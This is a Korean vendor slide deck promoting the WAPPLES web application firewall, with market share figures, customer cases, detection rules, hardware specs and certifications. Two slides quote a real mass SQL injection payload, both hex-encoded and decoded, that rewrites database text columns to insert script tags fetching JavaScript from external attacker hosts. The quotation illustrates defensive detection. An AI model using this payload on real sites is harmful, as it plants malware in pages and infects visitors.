I II III IV 웹방화벽의필요성 WAPPLES 위치 인증및수상현황 2

지능형웹어플리케이션방화벽 2013 년 12 월펜타시큐리티시스템

I II III IV 웹방화벽의필요성 WAPPLES 위치 인증및수상현황 2

I 웹방화벽의필요성 Internet 에접속되어있다는것 = 언제든 Hacker 의공격을받을수있다는것 Gartner 보고서에서도언급된바있듯이, Web 공격의 75% 가웹어플리케이션층을타겟으로발생하고있다. 3

I 웹방화벽의필요성 2000 년대이후공격유형변화 è 웹어플리케이션공격 웹을통한비즈니스가증가하면서웹어플리케이션의보급확장 B2B, B2C, G2C 등의다양한사업분야에서내부웹서비스뿐만아니라외부웹서비스를위하여사용하게되면서웹어플리케이션의보급이확장되는추세 웹어플리케이션에대한취약성증가 모든취약점중에 53% 가웹어플리케이션과관련 1 그중 26% 의알려진취약점만이해결됨 (2008 년말기준 ) 2 해커들의 No.1 공격타겟매 4.5 초마다해커들에게공격당한새로운페이지가발견 2 SQL Injection 은가장위협적인해킹기법 3 Others, 30% SQL Injection, 30% 1. IBM Internet Security Systems in 2008 X-Force Trend & Risk Report 2. Sophos, Security threat report: 2009 - Prepare for this year s new threats 3. WASC : The Web Hacking Incidents Database CSRF, 3% Cross Site Scripting (XSS), 8% Unknown, 29% 4

I 웹방화벽의필요성 웹어플리케이션층에대한공격위협증가 점점더많은기업, 기관, 정부및개인이웹을통한서비스확대로다양한웹접속장비가시장으로유입되고있으며, 그로인해웹어플리케이션층에대한공격위협은지속적으로증가하고있다. 2000 Today 5

I 웹방화벽의필요성 BYOD 시대도래로인한내부해킹위험증가 l Mobile Data Protection (MDP) 개인모바일장비해킹을통해가능한웹서버공격유형 Webshell Upload Stealth Commanding 등을통한서버내부데이터조작 개인정보유출 l 외부공격만방어하는방식의한계이미해킹당한개인모바일장비가기업내환경에접속할수있기때문에, 내부를통한웹서버해킹방지필요 WAPPLES 을이용하여내부망관련공격을탐지하고차단 l WAPPLES 을통한 Mobile Data Protection File Upload : Web Shell Upload 방지 Stealth Commanding : 서버내부데이터조작방지 Privacy Output/Input/File Filtering : 개인정보유출방지 6

I 웹방화벽의필요성 최근발생한치명적인사이버공격들모두웹해킹! 머니투데이 이코노믹리뷰 머니투데이 동아일보 7

OWASP TOP 10 SQL Injection Cross Site Scripting Web-based Malware Encrypted Data Access Control Secure Coding Analyzing & Reporting System Malware Signature Matching Ping of Death NetBIOS

II WAPPLES 위치 지능형웹방화벽 WAPPLES 통함데이터암호화솔루션 D Amo 60% 시장점유율로대한민국시장을선도. 2004 년이후 2,000 여대구축하여점유율 1 위 독창적인지능형보안엔진탑재 오탐없이알려지지않은공격까지차단 No.1 데이터암호화솔루션 2004 년이후 1,800 여개의고객사보유 Oracle(Enterprise/Standard), MS SQL, Server, DB2 지원 D Amo SG 와 D Amo SCP 를통해다양한보안환경에적용 강력한보안성 SSO 솔루션 ISign+ 국내최초 SSO 솔루션 2001 년국내최초로발표된기업내부보안을위한 Single Sign On 솔루션 전사적인정보보호인프라로서의 Single Sign-On 과 RBAC(role Based Access Control) 기술을도입한통합권한관리제공 9

II WAPPLES 위치 고객상황 온라인교육사이트를운영하는웹서버가홈페이지해킹후악성코드가대량으로배포되어과도한부하발생 컨텐츠를노린웹공격이중국으로부터수시로발생하여정상적인서비스제공에어려움을겪음 대응 설치구성도 웹방화벽을웹서버앞에인라인방식으로설치 로그분석을통해다양한백도어발견, 제거 백도어제거중공격자가설치한다양한악성코드설치를확인하고이를제거 중국으로부터의 SQL Injection 공격등을웹방화벽을통해차단 웹방화벽운영을통해컨텐츠복사시도차단도입효과 웹방화벽설치전악성코드의대량유포로인해웹서버의부하증가로수시로부팅을했으나웹방화벽운영후부하증가현상이소멸됨 악성코드차단및삭제를통해서비스를위한네트워크대역폭확보 교육사이트의주요자산인컨텐츠복사근절 10

II WAPPLES 위치 고객상황 외부에노출된그룹웨어및내부중요서버에대한보안 개인정보유출및지속적인자동화된공격보호필요 대응 설치구성도 이중화된네트워크지원을위해웹방화벽이중화 Active/Standby 구성및인라인방식구축 업무처리시발생되는웹어플리케이션오류확인 개인정보유출경로파악조치 자동화된공격발생시, 자동으로블랙리스트 IP 관리기능활용, URL 접근제어기능반영 도입효과 개인정보유출 / 웹어플리케이션오류 URL 보호를통한신뢰성제공 자동화된공격차단으로인한, 서비스안전성및가용성증가 보안감사시소스코드수정등에비해 TCO 절감 내부중요서버어플리케이션에대해, 인가된사용자만접근가능함에따라, 내부정보유출방지 11

II WAPPLES 위치 (2013 년 12 월누적기준 ) 구축수 펜타시큐리티 P사 T사 M사기타 - 500 1,000 1,500 2,000 12

II WAPPLES 위치 80% 70% 60% 50% 40% 30% 20% 10% 0% 2008 년 2009 년 2010 년 2011 년 2012 년 펜타시큐리티시스템트리니티소프트파이오링크윈스테크넷이지서티모니터랩 A. 침입방지조달판매량 (2008 년 ~ 2012 년 ) 판매순위 회사명 2008년 2009년 2010년 2011년 2012년 합계 1위 펜타시큐리티시스템 53 EA 93 EA 39 EA 38 EA 64 EA 287 EA 2위 트리니티소프트 32 EA 24 EA 9 EA 12 EA 11 EA 88 EA 3위 파이오링크 23 EA 8 EA 17 EA 14 EA 62 EA 4위 윈스테크넷 ( 나우콤 ) 9 EA 19 EA 12 EA 3 EA 43 EA 5위 이지서티 5 EA 1 EA 6 EA 6위 모니터랩 2 EA 2 EA 13

III A. 웹방화벽침입방지WAPPLES 특징 1 패턴 + 논리로직분석엔진을통한높은보안성 2 27 가지룰정책으로 OWASP 10 대항목외해킹다중탐지 3 동일사검증필암호모듈탑재로업데이트및유사시원활한지원 4 SSL 없이 Client 와웹방화벽구간암호화기능지원 5 통합관리솔루션 (WAPPLES-MS) 및 I.C.S 지원 6 관리편의성 UI 화면분할, Preset 정책, Drag&drop, Dot net 기반 7 다중네트워크지원및다양한구성환경지원 (In-Line, Proxy, One-Armed) 14

III WAPPLES 공격탐지엔진 : 3 가지평가방식을기반으로한 26 개의룰로구성 Heuristic( 학습 ) 분석기반의평가 Semantic( 의미 ) 분석기반의평가 Pattern Matching( 패턴매칭 ) 기반의평가 Heuristic( 학습 ) 분석기반의평가 Semantic( 의미 ) 분석기반의평가 Pattern Matching( 패턴매칭 ) 기반의평가 Cross Site Scripting Buffer Overflow Include Injection Directory Listing Cookie Poisoning Invalid HTTP Error Handling IP Block Invalid URI Extension Filtering Parameter Tampering Parameter Tampering File Upload Suspicious Access Privacy File Filtering Input Content Filtering URI Access Control Privacy Input Filtering IP Filtering Privacy Output Filtering Request Method Filtering Request Header Filtering Response Header Filtering SQL Injection User Defined Pattern Stealth Commanding Web Site Defacement Unicode Directory Traversal 15

III q DB 에악성 Java Script 삽입 Mass SQL Injection Bot q SQL Injection 공격의자동화및혼합 = SQL Injection + Cross Site Scripting q 공격의최종목적은웹서버가아닌사용자브라우저 = 트로이목마또는키로거 (Key logger) 설치 q 다중인코팅 2008-03-29 19:02:41 W3SVC1397586572 211.195.232.19 POST /OOOO/OOOOOO/OOOOOO_OOOOO_view.asp bid=pds_vod&num=51&page=1&od=&ky=&sh=';declare%20@s%20nvarchar(4000);set%20@s=cast(0x440045004300 4C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610 NVARCHAR(4000));EXEC(@S);-- 80-60.172.219.4 Mozilla/3.0+(compatible;+Indy+Library) - - 200 0 0 q 16 진수 à string à UTF-8 à ASCII DECLARE @T varchar(255),@c varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+' <script src=http://www.nihaorr1.com/1.js></script>''')fetch NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor 16

III Mass SQL Injection 탐지사례 Declare @T Varchar(255), @C Varchar(255) Declare Table_cursor Cursor For Select A.Name,B.Name From Sysobjects A, Syscolumns B Where A.Id = B.Id And A.Xtype='u' And (B.Xtype=99 or B.Xtype=35 or B.Xtype=231 or B.Xtype=167) Open Table_Cursor Fetch Next from table_cursor into @T, @C while (@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+''<script src=http://3b3.org./c.js></script>''') fetch next from table_cursor into @t, @c end close table_cursor deallocate table_cursor 17

III WAPPLES UI : 다양한정보를시각화 트래픽통계 (3D Line 그래프 ) 탐지로그 공격통계 (Pie Chart) 18

III WAPPLES UI : 설정마법사를통한운용성, 상세로그검색및백업, 복구 19

III A. 웹방화벽침입방지WAPPLES 특장점 1. 패턴방식 + 논리로직분석엔진탑재 등록수가한정되어있는패턴이아닌공격기법분석통한정확한웹공격탐지기능 사례 1 : 중국으로부터의다양한 SQL Injection 공격탐지 사례 2 : 신종 DDoS 공격인 Slowloris 공격및 RUDY(Are You Dead Yet) 공격탐지 사례 3 : 주민등록번호검증메커니즘을통한정확한개인정보유출방지 20

III A. 웹방화벽침입방지WAPPLES 특장점 2. 고객과웹방화벽구간을 SSL 없이암호화 웹서버에많은부하를주는 SSL 의단점을극복한 WAPPLES 만의고유한암호화기능 고객으로부터전송되는 HTML Form 을지정하여해당 Form 을암호화해주는기능 IE. FireFox, Chrome, Safari, Opera 등 Multi-Browser 를지원 21

III A. 웹방화벽침입방지WAPPLES 특장점 3. 통합관리솔루션 WAPPLES-MS 네트워크로연결된여러대의 WAPPLES 을하나의관리콘솔에서통합관리 그룹내보안정책동기화, 계층화된보안관리자지정, 통합된통계보고서생성등 WAPPLES MS 구성도 22

III A. 웹방화벽침입방지WAPPLES 특장점 4. Application Layer(L7 Layer) DDoS 방어 WAPPLES 의 Suspicious Access 룰의사용자설정에서 MayBlock Time 을설정하여 Slowloris, R.U.D.Y 등의 L7 DDoS 공격을차단기능제공 웹 DDoS 공격에대해임계치값을설정할수있음 23

III A. 웹방화벽침입방지WAPPLES 특장점 5. ICS WMP (WAPPLES MANAGEMENT PORTAL) 웹 GUI 기반의 WAPPLES Management Portal 서비스로스마트폰으로모니터링가능 WAPPLES ID 별상태 ( 정상 / 위험 / 장애 / 비활성 ) 및시스템현황모니터링 무응답과같은 WAPPLES 비정상상태시알림기능제공 (SMS, E-Mail) 24

III 구분 WAPPLES-50 WAPPLES-100eco 어플라이언스 1U Rack type 1U Rack type Memory 4 GB 4 GB HDD 160GB 500GB Throughput 최대 100 Mbps 최대 500 Mbps NIC 10/100/1000 x 6 port (Bypass 4port) (1 for management) 8 x 10/100/1000 BaseTX (1 for management) 외장 * 웹서버등록제한 : 4 대 25

III 구분 WAPPLES-500 WAPPLES-1200 어플라이언스 1U Rack type 2U Rack type Memory 8 GB 8 GB HDD 500GB 1TB Throughput 최대 500 Mbps 최대 2 Gbps NIC 10/100/1000 x 4 port (Bypass 2port) 추가구성 : 10/100/1000 x 4 port (Bypass 4port) 혹은 Fiber Gbic x 2 port (Bypass 2port) 2 x 10/100/1000 Base TX 4 x 10/100/1000 Base TX Bypass 추가구성 : 4 x 10/100/1000 BaseTX Bypass 8 x 10/100/1000 BaseTX Bypass 4 x 1000 Base SFP 8 x 1000 Base SFP 2 x 1000 Base Optical Bypass 외장 26

III 구분 WAPPLES-2200 WAPPLES-5000 어플라이언스 2U Rack type 2U Rack type Memory 16 GB 24 GB HDD 1TB 1TB Throughput 최대 4 Gbps 최대 10 Gbps NIC 2 x 10/100/1000 Base TX 4 x 10/100/1000 Base TX Bypass 추가구성 : 4 x 10/100/1000 BaseTX Bypass 8 x 10/100/1000 BaseTX Bypass 8 x 1000 Base SFP 2 x 1000 Base Optical Bypass 2 x 10G Base SFP 2 x 10G Base Optical Bypass 2 x 10/100/1000 BaseTX 8 x 10/100/1000 BaseTX Bypass 4 x 1000 BaseSFP 2 x 1000 Base Optical Bypass 추가구성 : 4 x 1000 Base Optical Bypass 2 x 10G Base Optical Bypass 외장 27

III 구분내용 WAPPLES 비고 전문성안정성신뢰성보안성편의성인증기타 제조사의전문성여부 고객운용수에따른회사및제품의안정성여부 제조사의체계적인기술지원여부 OWASP 10 대및국정원 8 대취약점외에기타해킹유형을탐지및차단 관리자의편의성을고려한 UI 및정책설정여부 보안장비의기준이되는인증여부 기타선정및운용에필요한사항 1997 년설립된웹보안전문회사 2,000 여대로국내 1 위점유율 웹방화벽전담부서운용및유사시지역협력사인원지원 총 27 개의룰 /Function 으로다중탐지 Dot NET 기반의유연한 UI CC 인증 (EAL4), GS 인증, IPv6 Ready Logo Silver Mark, 동일사검증필암호모듈탑재 녹색경영 (Green Biz) 선정기관, Intelligent Customer Service 28

IV 인증및수상현황 인증현황 2003.08: NIGT 의 FIPS 46-3, FIPS 197 인증획득 2007.03: 정보통신기술협회 (TTA) GS(Good Software) 인증 2008.01: 암호모듈 (CIS-CC ) 검증필 2009.12: PCI-DSS 준수인증획득 2010.04: MAPP(Microsoft Active Protections Program) 가입 2010.10: IPv6 Ready Logo Silver Mark 인증획득 2011.08: D Amo 2.3 SAP 인증추가 ( 독일 SAP 社 ) 2011.12: VMWare Solution Provider 자격획득 2012.09: 품질경영시스템인증 (ISO 9001:2008) 획득 2012.09: 환경경영시스템인증 (ISO 14001) 획득 2012.10: D Amo v3.0 GS 인증획득 2012.11: 국제 CC(Common Criteria) EAL4 인증 수상현황 2008.11: 한국지능정보시스템학회인텔리전스대상수상 2009.04: 지식경제부신소프트웨어상품대상수상 2009.11: 신기술실용화촉진대회 국무총리상수상 2010.02: 제 9 회대한민국 SW 기업경쟁력대상 고객만족도부문최우수상 수상 2010.07: 2010 년상반기 IT 혁신제품선정 2011.02: 제 10 회대한민국 SW 기업경쟁력특별상수상 2012.05: 특허스타기업선정 2012.11: 지식정보보안산업유공자지식경제부장관표창수상 2012.11: 2012 벤처활성화유공자중소기업청장표창 29

t h a n k y o u Inc. ( 본사 ) 대신정보통신 ( 주 ) 서울특별시영등포구여의도동 25-11 한진해운빌딩 20층 / 제품사업본부서울시금천구가산동 448번지대륭테크노타운 3차 2층대신정보통신 보안사업본부고재민과장 Mobile. 010-2336-8604 Tel. 02-2125-6641 Fax. 02-786-5281 / www.pentasecurity.com TEL. 02-2107-5051 FAX. 02-2107-5190 H.P. 010-9136-0760 / jjoint2@dsic.co.kr Copyright 2013 Inc. All rights reserved. Ver. 2.10